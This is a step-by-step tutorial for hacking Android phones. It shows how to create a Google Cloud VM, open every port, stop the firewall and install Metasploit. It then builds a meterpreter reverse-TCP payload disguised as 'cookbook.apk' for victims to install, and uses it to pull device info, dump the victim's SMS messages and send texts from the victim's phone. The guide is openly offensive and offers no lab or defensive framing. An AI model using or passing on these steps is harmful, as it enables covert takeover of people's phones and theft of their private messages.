Hacking Android Along With GCP Creation
Hacking Android Along With GCP Creation
Now click on “Start Free” present in the top right corner of the window as shown in the
screenshot.
Now you will see the “Signup” window appears. Then select your “Country” and your
“organization” and then click on “I agree”. And click on “Continue” to proceed.
Then you will receive a verification code in your EMAIL. Then paste the verification code
and click on “Verify” to proceed.
Now enter the payment details.
Now open new tab and type and search “console.cloud.google.com”.Then the Google
cloud window appears and then click on “Activate Full Account”.
And now click on Activate as shown in the screenshot.
Then select the operating system as “CentOS” and then click on “SELECT” as shown in the
screenshot.
Scroll down untill when “Firewall” appears , then select both the checkboxes under it as
shown in the screenshot.Then click on “Create”.
Then you will see your newly cretated VM instance under “VM Instances” as shown in the
screenshot.
Now click on the three dots present in the one the right side as shown in the screenshot.
Now select second source filter as “None” , select Protocols and ports as “Allow all”.Now
save it.
Now click on the three bar symbol present in the left side of the window as shown in the
screenshot.
Now you will be able to see all protocols are allowed as shown in the screenshot.
Now we need to start SSH. To start SSH click on ”SSH” as shown in the screenshot.
After SSH is opened you will see the following terminal appearing.
Then use command: “ls” to check whether the file got downloaded or not.
Now to run installer type command: “./msfinstall” and hit enter. Then you will see the
installation gets started.
Now we need to install “HTTPD” by using command: “yum install httpd” and hit enter.Then
the installation starts.
Now to check the status of the httpd service use command: “systemctl status -l httpd”
Now we need to stop the “firewalld” service using command: “systemctl stop firewalld”
To reccheck whether the “firewalld” service is not running use command: “firewall-cmd --
list-all”
Now we should make a directory to save the payload. Here we name the directory as
“recipe”
Now we need to create the payload using msfvenom by using command: “msfvenom -p
android/meterpreter/reverse_tcp LHOST=<Public-IP of Virtual machine>
LPORT=4444 R> /var/www/html/recipe/cookbook.apk”
Here the Public IP of the virtual machine is:”35.184.49.161”.As shown in the screenshot.
Now use command: “sysinfo” to get the system information of the device.
Now use command: “dump_sms” to save all the messages of the victim into the attacker
machine.
Now you can use command: send_sms -d [phone number to send message] -t
“(message)”.